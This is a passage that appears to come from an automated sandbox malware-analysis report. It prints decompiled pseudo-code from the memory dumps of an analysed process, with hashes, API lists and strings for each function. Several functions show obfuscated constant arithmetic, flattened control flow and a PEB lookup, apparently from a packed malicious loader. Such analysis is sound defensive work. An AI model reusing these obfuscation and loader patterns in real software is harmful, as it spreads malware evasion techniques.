                                              					if(_t109 == 0) {
                                              						break;
                                              					}
                                              					if(_t109 == 0x2e) {
                                              						 *_t120 = 0;
                                              					} else {
                                              						 *_t120 = _t109;
                                              						_t120 = _t120 + 1;
                                              						_t139 = _t139 + 1;
                                              						continue;
                                              					}
                                              					L6:
                                              					_t140 = E0022F22A(_v44, _v12,  &_v304, _v28);
                                              					if(_t140 != 0) {
                                              						L8:
                                              						_push(E00238634(_v40, _t139 + 1, _v16) ^ 0x762b677b);
                                              						_push(_t140);
                                              						return E00230126(_v32, _v24);
                                              					}
                                              					_t115 = E00234AAF( &_v304, _v36, _v8, _v20);
                                              					_t140 = _t115;
                                              					if(_t140 != 0) {
                                              						goto L8;
                                              					}
                                              					return _t115;
                                              				}
                                              				goto L6;
                                              			}























                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 94b0c3d6e61e61ea0f224150d988a8d30d783f5daa19532cd6a56022687b62a3
                                              • Instruction ID: 82a7fd0648988a539e0a5433a8af3219ca3ebe04d4972db08f23cb31bd60efbb
                                              • Opcode Fuzzy Hash: 94b0c3d6e61e61ea0f224150d988a8d30d783f5daa19532cd6a56022687b62a3
                                              • Instruction Fuzzy Hash: 10514271C0121ADBEF48CFA0D94A5EEBBB1FB44304F20819AD011BA2A0D7B91B55CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 89%
                                              			E002248BD(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				unsigned int _v16;
                                              				unsigned int _v20;
                                              				signed int _v24;
                                              				signed int _v28;
                                              				signed int _v32;
                                              				signed int _v36;
                                              				intOrPtr _v40;
                                              				intOrPtr _v44;
                                              				intOrPtr _v48;
                                              				void* _t84;
                                              				intOrPtr* _t95;
                                              				signed int _t103;
                                              				signed int _t104;
                                              				void* _t105;
                                              				signed int _t108;
                                              				void* _t122;
                                              
                                              				_t122 = __ecx;
                                              				_push(0x23c110);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__edx);
                                              				_push(__ecx);
                                              				E0022602B(_t84);
                                              				_v48 = 0x61abc6;
                                              				_v44 = 0;
                                              				_v40 = 0;
                                              				_v20 = 0x3115;
                                              				_v20 = _v20 >> 0xf;
                                              				_v20 = _v20 >> 0xb;
                                              				_v20 = _v20 ^ 0x0000604b;
                                              				_v16 = 0xb2e9;
                                              				_v16 = _v16 >> 0xf;
                                              				_v16 = _v16 + 0x4f02;
                                              				_v16 = _v16 ^ 0x00000d08;
                                              				_v8 = 0x47ff;
                                              				_v8 = _v8 + 0xba3e;
                                              				_t103 = 0x68;
                                              				_v8 = _v8 / _t103;
                                              				_t104 = 0x36;
                                              				_v8 = _v8 * 0x26;
                                              				_v8 = _v8 ^ 0x00006b48;
                                              				_v12 = 0x7283;
                                              				_v12 = _v12 + 0xffffff70;
                                              				_v12 = _v12 >> 5;
                                              				_v12 = _v12 | 0x62bbfeca;
                                              				_v12 = _v12 ^ 0x62bbef9f;
                                              				_v32 = 0x955e;
                                              				_v32 = _v32 + 0x386b;
                                              				_v32 = _v32 ^ 0x0000cdee;
                                              				_v36 = 0x2587;
                                              				_v36 = _v36 ^ 0xc63d9950;
                                              				_v36 = _v36 ^ 0xc63dc5f3;
                                              				_v28 = 0xb9df;
                                              				_v28 = _v28 ^ 0xf1a14283;
                                              				_v28 = _v28 * 0x63;
                                              				_v28 = _v28 ^ 0x71a43d80;
                                              				_v24 = 0x4453;
                                              				_v24 = _v24 << 3;
                                              				_t105 = 0x4c;
                                              				_v24 = _v24 / _t104;
                                              				_v24 = _v24 ^ 0x00004bab;
                                              				_t95 = E00228736(_t105);
                                              				 *0x23ca38 = _t95;
                                              				if(_t95 == 0) {
                                              					L7:
                                              					return 0;
                                              				}
                                              				_t108 =  *(_t95 + 0x3c);
                                              				 *((intOrPtr*)(_t95 + 0x14)) = 0x23c110;
                                              				 *_t95 = 0x23c110;
                                              				 *((intOrPtr*)(_t95 + 0x24)) = 0;
                                              				while( *((intOrPtr*)(0x23c110 + _t108 * 8)) != 0) {
                                              					_t108 = _t108 + 1;
                                              					 *(_t95 + 0x3c) = _t108;
                                              				}
                                              				if(E00221CFA(_v32, _t122) == 0) {
                                              					E0022F536(_v36, _v28, _v24,  *0x23ca38);
                                              					goto L7;
                                              				}
                                              				return 1;
                                              			}

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 669e071c1581c48734254eaaa21a4a16af5eb2f45ab2fb20f55ff8b4b5e56d5d
                                              • Instruction ID: 515ab2d9ed92ce6ba1c9cbfeaedf590d4aaa23bf80b429ad75a9e9cfac639d07
                                              • Opcode Fuzzy Hash: 669e071c1581c48734254eaaa21a4a16af5eb2f45ab2fb20f55ff8b4b5e56d5d
                                              • Instruction Fuzzy Hash: 684146B2D10219EFDB48CFA5E94A4EEFBB5FF44314F20805AD501BA290D7B84A55CF94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 96%
                                              			E002367E9() {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				signed int _v16;
                                              				signed int _v20;
                                              				signed int _v24;
                                              				signed int _v28;
                                              				signed int _v32;
                                              				signed int _v36;
                                              				signed int _v40;
                                              				signed int _v44;
                                              				signed int _v48;
                                              				void* _t116;
                                              				intOrPtr* _t143;
                                              				intOrPtr _t146;
                                              				void* _t151;
                                              				void* _t152;
                                              
                                              				_t152 = _t151 - 0x2c;
                                              				_v8 = 0xa05a;
                                              				_v8 = _v8 | 0x4de4d3b6;
                                              				_push(0x77);
                                              				_t143 = 0x23ca24;
                                              				_push(0x67);
                                              				_v8 = _v8 / 0;
                                              				_v8 = _v8 >> 0xa;
                                              				_v8 = _v8 ^ 0x000036e5;
                                              				_v44 = 0x8c67;
                                              				_v44 = _v44 * 0x22;
                                              				_v44 = _v44 ^ 0x00129d81;
                                              				_v24 = 0xef;
                                              				_v24 = _v24 + 0xffff82ae;
                                              				_v24 = _v24 >> 4;
                                              				_v24 = _v24 ^ 0x0fffc315;
                                              				_v12 = 0xac64;
                                              				_v12 = _v12 >> 6;
                                              				_v12 = _v12 / 0;
                                              				_v12 = _v12 ^ 0x56eede11;
                                              				_v12 = _v12 ^ 0x56ee9803;
                                              				_v32 = 0x5470;
                                              				_v32 = _v32 >> 1;
                                              				_v32 = _v32 << 7;
                                              				_v32 = _v32 ^ 0x00150b15;
                                              				_v36 = 0xc745;
                                              				_v36 = _v36 >> 0xb;
                                              				_v36 = _v36 >> 8;
                                              				_v36 = _v36 ^ 0x00006261;
                                              				_v16 = 0x5384;
                                              				_v16 = _v16 | 0x59782290;
                                              				_v16 = _v16 << 2;
                                              				_v16 = _v16 + 0xffff2741;
                                              				_v16 = _v16 ^ 0x65e0bd40;
                                              				_v20 = 0x334d;
                                              				_v20 = _v20 | 0xb04f2549;
                                              				_v20 = _v20 + 0xf20e;
                                              				_v20 = _v20 + 0x9932;
                                              				_v20 = _v20 ^ 0xb050c5c9;
                                              				_v40 = 0xe415;
                                              				_v40 = _v40 * 0x55;
                                              				_v40 = _v40 + 0x2e22;
                                              				_v40 = _v40 ^ 0x004bf03f;
                                              				_v48 = 0x3d8d;
                                              				_v48 = _v48 << 1;
                                              				_v48 = _v48 ^ 0x00006d20;
                                              				_v28 = 0x48e5;
                                              				_v28 = _v28 << 3;
                                              				_v28 = _v28 << 0xe;
                                              				_v28 = _v28 ^ 0x91ca0000;
                                              				_t146 =  *0x23ca24; // 0x0
                                              				while(_t146 != 0) {
                                              					if( *((intOrPtr*)(_t146 + 0x28)) == 0) {
                                              						L5:
                                              						 *_t143 =  *((intOrPtr*)(_t146 + 0x2c));
                                              						_t116 = E0022F536(_v20, _v40, _v48, _t146);
                                              					} else {
                                              						_t116 = E0023086F(_v8, _v44,  *((intOrPtr*)(_t146 + 0x1c)), 0, _v24);
                                              						_t152 = _t152 + 0xc;
                                              						if(_t116 != _v28) {
                                              							_t108 = _t146 + 0x2c; // 0x2c
                                              							_t143 = _t108;
                                              						} else {
                                              							 *((intOrPtr*)(_t146 + 4))( *((intOrPtr*)(_t146 + 0x28)), 0, 0);
                                              							E0023422C(_v12,  *((intOrPtr*)(_t146 + 0x28)), _v32);
                                              							E00234F7D(_v36, _v16,  *((intOrPtr*)(_t146 + 0x1c)));
                                              							goto L5;
                                              						}
                                              					}
                                              					_t146 =  *_t143;
                                              				}
                                              				return _t116;
                                              			}

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0761b07f4cf0ac281901126de76b4bd316819ff5dc27cb8a1b4bec5c01dbfc65
                                              • Instruction ID: d94058851e99ad691889cfdfe7e0c7d5aa1e2f1eaf7989e4579ae6a770d92688
                                              • Opcode Fuzzy Hash: 0761b07f4cf0ac281901126de76b4bd316819ff5dc27cb8a1b4bec5c01dbfc65
                                              • Instruction Fuzzy Hash: A4410171D0131DDBDB48CFA5D68A4DEBBB0BB14758F208059C515BA290C7B80B49CF94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 96%
                                              			E00237A0F(void* __ecx) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				signed int _v16;
                                              				signed int _v20;
                                              				signed int _v24;
                                              				signed int _v28;
                                              				void* _t43;
                                              				void* _t47;
                                              				void* _t50;
                                              				void* _t56;
                                              				void* _t57;
                                              
                                              				_t50 = __ecx;
                                              				_v16 = 0xca2c;
                                              				_v16 = _v16 ^ 0x4de68128;
                                              				_v16 = _v16 ^ 0x4de62eb9;
                                              				_v8 = 0x8c11;
                                              				_v8 = _v8 + 0x5792;
                                              				_v8 = _v8 ^ 0x1f44ca2d;
                                              				_v8 = _v8 << 0xa;
                                              				_v8 = _v8 ^ 0x10a60930;
                                              				_v28 = 0x568d;
                                              				_v28 = _v28 >> 6;
                                              				_v28 = _v28 ^ 0x00005e22;
                                              				_v24 = 0x104e;
                                              				_v24 = _v24 << 0x10;
                                              				_v24 = _v24 ^ 0x104e2f39;
                                              				_v20 = 0x2b0b;
                                              				_v20 = _v20 << 5;
                                              				_v20 = _v20 ^ 0x000512d1;
                                              				_v12 = 0x980d;
                                              				_v12 = _v12 + 0x309b;
                                              				_v12 = _v12 >> 1;
                                              				_t56 = 0;
                                              				_v12 = _v12 ^ 0x00001aed;
                                              				_t43 = 0xce8bfa4;
                                              				do {
                                              					while(_t43 != 0xce8bfa4) {
                                              						if(_t43 == 0x19c25828) {
                                              							_push(_t50);
                                              							_t47 = E00237F1B();
                                              							_t57 = _t57 + 4;
                                              							_t56 = _t56 + _t47;
                                              							_t43 = 0x375743b0;
                                              							continue;
                                              						} else {
                                              							if(_t43 != 0x375743b0) {
                                              								goto L8;
                                              							} else {
                                              								_t56 = _t56 + E0022D64E(_v28, _v24, _v20, _t50 + 4, _v12);
                                              							}
                                              						}
                                              						L5:
                                              						return _t56;
                                              					}
                                              					_t43 = 0x19c25828;
                                              					L8:
                                              				} while (_t43 != 0x2a4614b);
                                              				goto L5;
                                              			}

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 362bc142d129daebced84241c2bae281a61a82d17f508644e8d31eb90b62e200
                                              • Instruction ID: 17b0fb7bb0e4b811e5587403f8e01df3ec3ee82dff6d6caddfd722d803766946
                                              • Opcode Fuzzy Hash: 362bc142d129daebced84241c2bae281a61a82d17f508644e8d31eb90b62e200
                                              • Instruction Fuzzy Hash: 5C2189B1E14219ABDF54DEA4D88A4AFFBB0FB00308F648059D505B3241E3B54B54CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 95%
                                              			E0023687F(void* __ecx, signed int __edx, void* __eflags) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				signed int _v16;
                                              				signed int _v20;
                                              				signed int _v24;
                                              				signed int _v28;
                                              				char _v32;
                                              				signed int _v36;
                                              				signed int _t63;
                                              				signed int _t72;
                                              
                                              				_v32 = 4;
                                              				_v8 = 0xaf15;
                                              				_v8 = _v8 << 0xf;
                                              				_v8 = _v8 >> 0xa;
                                              				_v8 = _v8 + 0x6e7b;
                                              				_v8 = _v8 ^ 0x2016511b;
                                              				_v24 = 0x477;
                                              				_v24 = _v24 + 0xffffb380;
                                              				_t72 = 0x7f;
                                              				_v24 = _v24 / _t72;
                                              				_v24 = _v24 ^ 0x02042a92;
                                              				_v20 = 0x93b6;
                                              				_v20 = _v20 * 0x30;
                                              				_v20 = _v20 ^ 0x44f1257f;
                                              				_v20 = _v20 ^ 0x44eaddee;
                                              				_v16 = 0x6bfa;
                                              				_v16 = _v16 >> 0xa;
                                              				_v16 = _v16 + 0xffff28a3;
                                              				_v16 = _v16 ^ 0xffff7b62;
                                              				_v28 = 0xaf58;
                                              				_v28 = _v28 ^ 0x6486cb7d;
                                              				_v28 = _v28 ^ 0x6486241a;
                                              				_v12 = 0x7e30;
                                              				_v12 = _v12 + 0x9611;
                                              				_v12 = _v12 << 0xd;
                                              				_v12 = _v12 ^ 0x22884747;
                                              				_t63 = E0023674B( &_v36, _v24, __ecx, _v8 | __edx, __ecx, _v20,  &_v32, _v16, _v28, _v12);
                                              				asm("sbb eax, eax");
                                              				return  ~_t63 & _v36;
                                              			}














                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fe6ba01be8fb5c0da9d2f06e75f2fa44d8968acd521b874d952cc1c4be9b7d87
                                              • Instruction ID: 9c3e256c8f9ebbbc81008d5d61c249c13c6c34c69d44a56dd77fa5c105488b27
                                              • Opcode Fuzzy Hash: fe6ba01be8fb5c0da9d2f06e75f2fa44d8968acd521b874d952cc1c4be9b7d87
                                              • Instruction Fuzzy Hash: 1F21E0B2D0021EABDB15CFE1C94A9EEFBB5FB10204F108299D521B61A0D3B84B59CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E0022C4FF() {
                                              
                                              				return  *[fs:0x30];
                                              			}



                                              0x0022c505

                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                              • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                              • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                              • Instruction Fuzzy Hash:
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 78%
                                              			E10007337(void* __eax, void* __ebx) {
                                              				intOrPtr _t5;
                                              				intOrPtr _t6;
                                              				intOrPtr _t7;
                                              				LONG* _t8;
                                              				void* _t9;
                                              				void* _t14;
                                              				void* _t24;
                                              				intOrPtr* _t25;
                                              				intOrPtr* _t26;
                                              
                                              				_t14 = __ebx;
                                              				__imp__DecodePointer( *0x10014d88);
                                              				_t25 =  *0x100132dc; // 0x0
                                              				_t24 = __eax;
                                              				if(_t25 != 0) {
                                              					while( *_t25 != 0) {
                                              						E10004732( *_t25);
                                              						_t25 = _t25 + 4;
                                              						if(_t25 != 0) {
                                              							continue;
                                              						}
                                              						break;
                                              					}
                                              					_t25 =  *0x100132dc; // 0x0
                                              				}
                                              				_push(_t14);
                                              				E10004732(_t25);
                                              				_t26 =  *0x100132d8; // 0x0
                                              				 *0x100132dc = 0;
                                              				if(_t26 != 0) {
                                              					while( *_t26 != 0) {
                                              						E10004732( *_t26);
                                              						_t26 = _t26 + 4;
                                              						if(_t26 != 0) {
                                              							continue;
                                              						}
                                              						break;
                                              					}
                                              					_t26 =  *0x100132d8; // 0x0
                                              				}
                                              				E10004732(_t26);
                                              				 *0x100132d8 = 0;
                                              				E10004732( *0x100132d4);
                                              				_t5 = E10004732( *0x100132d0);
                                              				 *0x100132d4 = 0;
                                              				 *0x100132d0 = 0;
                                              				if(_t24 != 0xffffffff) {
                                              					_t5 = E10004732(_t24);
                                              				}
                                              				__imp__EncodePointer(0);
                                              				 *0x10014d88 = _t5;
                                              				_t6 =  *0x10013c1c; // 0x0
                                              				if(_t6 != 0) {
                                              					E10004732(_t6);
                                              					 *0x10013c1c = 0;
                                              				}
                                              				_t7 =  *0x10013c20; // 0x0
                                              				if(_t7 != 0) {
                                              					E10004732(_t7);
                                              					 *0x10013c20 = 0;
                                              				}
                                              				_t8 = InterlockedDecrement( *0x10012394);
                                              				if(_t8 == 0) {
                                              					_t8 =  *0x10012394; // 0x10012690
                                              					if(_t8 != 0x10012690) {
                                              						_t9 = E10004732(_t8);
                                              						 *0x10012394 = 0x10012690;
                                              						return _t9;
                                              					}
                                              				}
                                              				return _t8;
                                              			}













                                              APIs
                                              • DecodePointer.KERNEL32(?,00000001,10004522,10010AC8,00000008,10004659,?,00000001,?,10010AE8,0000000C,100045F8,?,00000001,?), ref: 1000733F
                                              • _free.LIBCMT ref: 10007358
                                                • Part of subcall function 10004732: HeapFree.KERNEL32(00000000,00000000), ref: 10004746
                                                • Part of subcall function 10004732: GetLastError.KERNEL32(00000000,?,100060FF,00000000), ref: 10004758
                                              • _free.LIBCMT ref: 1000736B
                                              • _free.LIBCMT ref: 10007389
                                              • _free.LIBCMT ref: 1000739B
                                              • _free.LIBCMT ref: 100073AC
                                              • _free.LIBCMT ref: 100073B7
                                              • _free.LIBCMT ref: 100073D1
                                              • EncodePointer.KERNEL32(00000000), ref: 100073D8
                                              • _free.LIBCMT ref: 100073ED
                                              • _free.LIBCMT ref: 10007403
                                              • InterlockedDecrement.KERNEL32 ref: 10007415
                                              • _free.LIBCMT ref: 1000742F
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2115600248.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000007.00000002.2115584356.0000000010000000.00000002.00020000.sdmp
                                              • Associated: 00000007.00000002.2115635529.000000001000D000.00000002.00020000.sdmp
                                              • Associated: 00000007.00000002.2115656527.0000000010012000.00000004.00020000.sdmp
                                              • Associated: 00000007.00000002.2115677339.0000000010015000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: _free$Pointer$DecodeDecrementEncodeErrorFreeHeapInterlockedLast
                                              • String ID:
                                              • API String ID: 4264854383-0
                                              • Opcode ID: 47f49911c4d150f6d4b37a25648bd1e08eedf16aa526d4bf5ee7911870840c54
                                              • Instruction ID: 9ff3ff2e384702bc94cc79564f1671d498055a0f5ee0a3dca53a83b71b13782d
                                              • Opcode Fuzzy Hash: 47f49911c4d150f6d4b37a25648bd1e08eedf16aa526d4bf5ee7911870840c54
                                              • Instruction Fuzzy Hash: 76212CB59042319BFA00EF64DCC151937A4FB053E1712C06AE94CA726ACF38DE81AB94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 55%
                                              			E10002F70(void* __ecx, intOrPtr _a4, intOrPtr* _a8) {
                                              				signed int _v8;
                                              				char _v528;
                                              				char _v1048;
                                              				void* _v1052;
                                              				void* _v1056;
                                              				char _v1060;
                                              				void* _v1064;
                                              				char _v1068;
                                              				char _v1084;
                                              				char _v1100;
                                              				void* __ebx;
                                              				void* __edi;
                                              				void* __esi;
                                              				signed int _t63;
                                              				char* _t67;
                                              				intOrPtr* _t71;
                                              				char _t72;
                                              				intOrPtr _t75;
                                              				intOrPtr* _t76;
                                              				intOrPtr _t80;
                                              				intOrPtr* _t81;
                                              				intOrPtr* _t83;
                                              				intOrPtr _t84;
                                              				intOrPtr* _t85;
                                              				intOrPtr _t86;
                                              				intOrPtr* _t87;
                                              				intOrPtr* _t89;
                                              				intOrPtr _t93;
                                              				intOrPtr* _t94;
                                              				intOrPtr _t95;
                                              				intOrPtr _t98;
                                              				intOrPtr _t100;
                                              				intOrPtr _t104;
                                              				intOrPtr* _t109;
                                              				intOrPtr _t110;
                                              				intOrPtr _t112;
                                              				intOrPtr* _t113;
                                              				void* _t115;
                                              				intOrPtr* _t120;
                                              				intOrPtr* _t129;
                                              				intOrPtr* _t130;
                                              				intOrPtr* _t132;
                                              				intOrPtr* _t136;
                                              				signed int _t138;
                                              				intOrPtr _t152;
                                              
                                              				_t63 =  *0x10012158; // 0x3c5a3040
                                              				_v8 = _t63 ^ _t138;
                                              				_t137 = _a4;
                                              				_t136 = _a8;
                                              				_t115 = __ecx;
                                              				E100043E0( &_v528, 0, 0x208);
                                              				_t67 =  &_v528;
                                              				__imp__PSStringFromPropertyKey(_a4, _t67, 0x104);
                                              				if(_t67 < 0 || E10002730(_t136,  &_v1068) < 0) {
                                              					L25:
                                              					return E10003850(_t115, _v8 ^ _t138, _t134, _t136, _t137);
                                              				} else {
                                              					_t71 =  *((intOrPtr*)(_t115 + 0x18));
                                              					_t134 =  &_v1064;
                                              					_v1064 = 0;
                                              					_t72 =  *((intOrPtr*)( *_t71 + 0xb4))(_t71,  &_v1064);
                                              					if(_t72 != 0) {
                                              						_t137 = 0x8000ffff;
                                              						L24:
                                              						__imp__CoTaskMemFree(_v1068);
                                              						goto L25;
                                              					}
                                              					_t120 = _v1064;
                                              					_t134 =  &_v1060;
                                              					_v1060 = _t72;
                                              					_v1056 = _t120;
                                              					_t75 =  *((intOrPtr*)( *_t120 + 0x94))(_t120, L"ExtendedProperties",  &_v1060);
                                              					_t137 = _t75;
                                              					if(_t75 == 0) {
                                              						L6:
                                              						if(_t152 < 0) {
                                              							L22:
                                              							_t76 = _v1064;
                                              							 *((intOrPtr*)( *_t76 + 8))(_t76);
                                              							goto L24;
                                              						}
                                              						_t80 = E10002810( &_v1048, 0x104, L"Property[@Key = \'%s\']",  &_v528);
                                              						_t137 = _t80;
                                              						if(_t80 < 0) {
                                              							L21:
                                              							_t81 = _v1060;
                                              							 *((intOrPtr*)( *_t81 + 8))(_t81);
                                              							goto L22;
                                              						}
                                              						_v1056 = 0;
                                              						if( *_t136 == 0) {
                                              							_t83 = _v1060;
                                              							_t134 =  &_v1048;
                                              							_t84 =  *((intOrPtr*)( *_t83 + 0x94))(_t83,  &_v1048,  &_v1056);
                                              							_t137 = _t84;
                                              							if(_t84 != 0) {
                                              								goto L21;
                                              							}
                                              							_t85 = _v1060;
                                              							_t134 =  &_v1052;
                                              							_t86 =  *((intOrPtr*)( *_t85 + 0x50))(_t85, _v1056,  &_v1052);
                                              							_t137 = _t86;
                                              							if(_t86 < 0) {
                                              								L20:
                                              								_t87 = _v1056;
                                              								 *((intOrPtr*)( *_t87 + 8))(_t87);
                                              								goto L21;
                                              							}
                                              							L19:
                                              							_t89 = _v1052;
                                              							 *((intOrPtr*)( *_t89 + 8))(_t89);
                                              							goto L20;
                                              						}
                                              						_t93 = E10002940(_t115, _v1060, L"Property",  &_v1048,  &_v1056);
                                              						_t137 = _t93;
                                              						if(_t93 < 0) {
                                              							goto L21;
                                              						}
                                              						_t94 = _v1056;
                                              						_t134 =  &_v1052;
                                              						_v1052 = 0;
                                              						_t95 =  *((intOrPtr*)( *_t94))(_t94, 0x1000d4f0,  &_v1052);
                                              						_t137 = _t95;
                                              						if(_t95 < 0) {
                                              							goto L20;
                                              						}
                                              						asm("xorps xmm0, xmm0");
                                              						asm("movq [ebp-0x448], xmm0");
                                              						asm("movq [ebp-0x440], xmm0");
                                              						_t98 = E10002390( &_v528,  &_v1100);
                                              						_t137 = _t98;
                                              						if(_t98 >= 0) {
                                              							asm("xorps xmm0, xmm0");
                                              							asm("movq [ebp-0x438], xmm0");
                                              							asm("movq [ebp-0x430], xmm0");
                                              							_t100 = E10002390(_v1068,  &_v1084);
                                              							_t136 = __imp__#9;
                                              							_t137 = _t100;
                                              							if(_t100 >= 0) {
                                              								_t129 = _v1052;
                                              								asm("movq xmm0, [ebp-0x448]");
                                              								_t134 =  *_t129;
                                              								asm("movq [eax], xmm0");
                                              								asm("movq xmm0, [ebp-0x440]");
                                              								asm("movq [eax+0x8], xmm0");
                                              								_t104 =  *((intOrPtr*)( *_t129 + 0xb4))(_t129, L"Key");
                                              								_t137 = _t104;
                                              								if(_t104 >= 0) {
                                              									_t130 = _v1052;
                                              									asm("movq xmm0, [ebp-0x438]");
                                              									_t134 =  *_t130;
                                              									asm("movq [eax], xmm0");
                                              									asm("movq xmm0, [ebp-0x430]");
                                              									asm("movq [eax+0x8], xmm0");
                                              									_t137 =  *((intOrPtr*)( *_t130 + 0xb4))(_t130, L"EncodedValue");
                                              								}
                                              								 *_t136( &_v1084);
                                              							}
                                              							 *_t136( &_v1100);
                                              						}
                                              						goto L19;
                                              					}
                                              					_t109 =  *((intOrPtr*)(_t115 + 0x18));
                                              					_t134 =  &_v1052;
                                              					_v1052 = 0;
                                              					_t110 =  *((intOrPtr*)( *_t109 + 0xbc))(_t109, L"ExtendedProperties",  &_v1052);
                                              					_t137 = _t110;
                                              					if(_t110 < 0) {
                                              						goto L22;
                                              					}
                                              					_t132 = _v1056;
                                              					_t134 =  &_v1060;
                                              					_t112 =  *((intOrPtr*)( *_t132 + 0x54))(_t132, _v1052,  &_v1060);
                                              					_t137 = _t112;
                                              					_t113 = _v1052;
                                              					 *((intOrPtr*)( *_t113 + 8))(_t113);
                                              					_t152 = _t112;
                                              					goto L6;
                                              				}
                                              			}

                                              APIs
                                              • _memset.LIBCMT ref: 10002F9C
                                              • PSStringFromPropertyKey.PROPSYS(?,?,00000104,?,00000000,?), ref: 10002FB1
                                                • Part of subcall function 10002730: StgSerializePropVariant.PROPSYS(?,?,?,?,?,?,10002FCC,?,?), ref: 10002741
                                                • Part of subcall function 10002730: CryptBinaryToStringW.CRYPT32(?,?,40000001,00000000,?), ref: 10002761
                                                • Part of subcall function 10002730: CoTaskMemAlloc.OLE32(?), ref: 10002782
                                                • Part of subcall function 10002730: CryptBinaryToStringW.CRYPT32(?,?,40000001,00000000,?), ref: 100027AA
                                                • Part of subcall function 10002730: CoTaskMemFree.OLE32(00000000), ref: 100027CC
                                                • Part of subcall function 10002730: CoTaskMemFree.OLE32(?), ref: 100027D6
                                              • VariantClear.OLEAUT32(?), ref: 100031F1
                                              • VariantClear.OLEAUT32(?), ref: 100031FA
                                              • CoTaskMemFree.OLE32(?), ref: 1000327D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2115600248.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000007.00000002.2115584356.0000000010000000.00000002.00020000.sdmp
                                              • Associated: 00000007.00000002.2115635529.000000001000D000.00000002.00020000.sdmp
                                              • Associated: 00000007.00000002.2115656527.0000000010012000.00000004.00020000.sdmp
                                              • Associated: 00000007.00000002.2115677339.0000000010015000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: Task$FreeStringVariant$BinaryClearCrypt$AllocFromPropPropertySerialize_memset
                                              • String ID: EncodedValue$ExtendedProperties$Key$Property$Property[@Key = '%s']
                                              • API String ID: 2822920939-4160240301
                                              • Opcode ID: 219fdd7958d1f89b209afaf070f8bbe6a3b597640a3a0689fd0c674af5758409
                                              • Instruction ID: b44c940bb5c53acf28a028c4714afd445dfdab1042c841ebd87cdd8d19aaa573
                                              • Opcode Fuzzy Hash: 219fdd7958d1f89b209afaf070f8bbe6a3b597640a3a0689fd0c674af5758409
                                              • Instruction Fuzzy Hash: DC9136B1D002299BDB61DB54CC44BDEB7B8EF49754F0082E9EA08A7215DB319EC5CFA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 55%
                                              			E10003400(intOrPtr _a4, intOrPtr _a8, char _a12, intOrPtr _a16, WCHAR* _a20, void _a24) {
                                              				signed int _v8;
                                              				short _v10;
                                              				long _v1032;
                                              				intOrPtr _v1036;
                                              				intOrPtr _v1040;
                                              				void* __ebx;
                                              				void* __edi;
                                              				void* __esi;
                                              				signed int _t20;
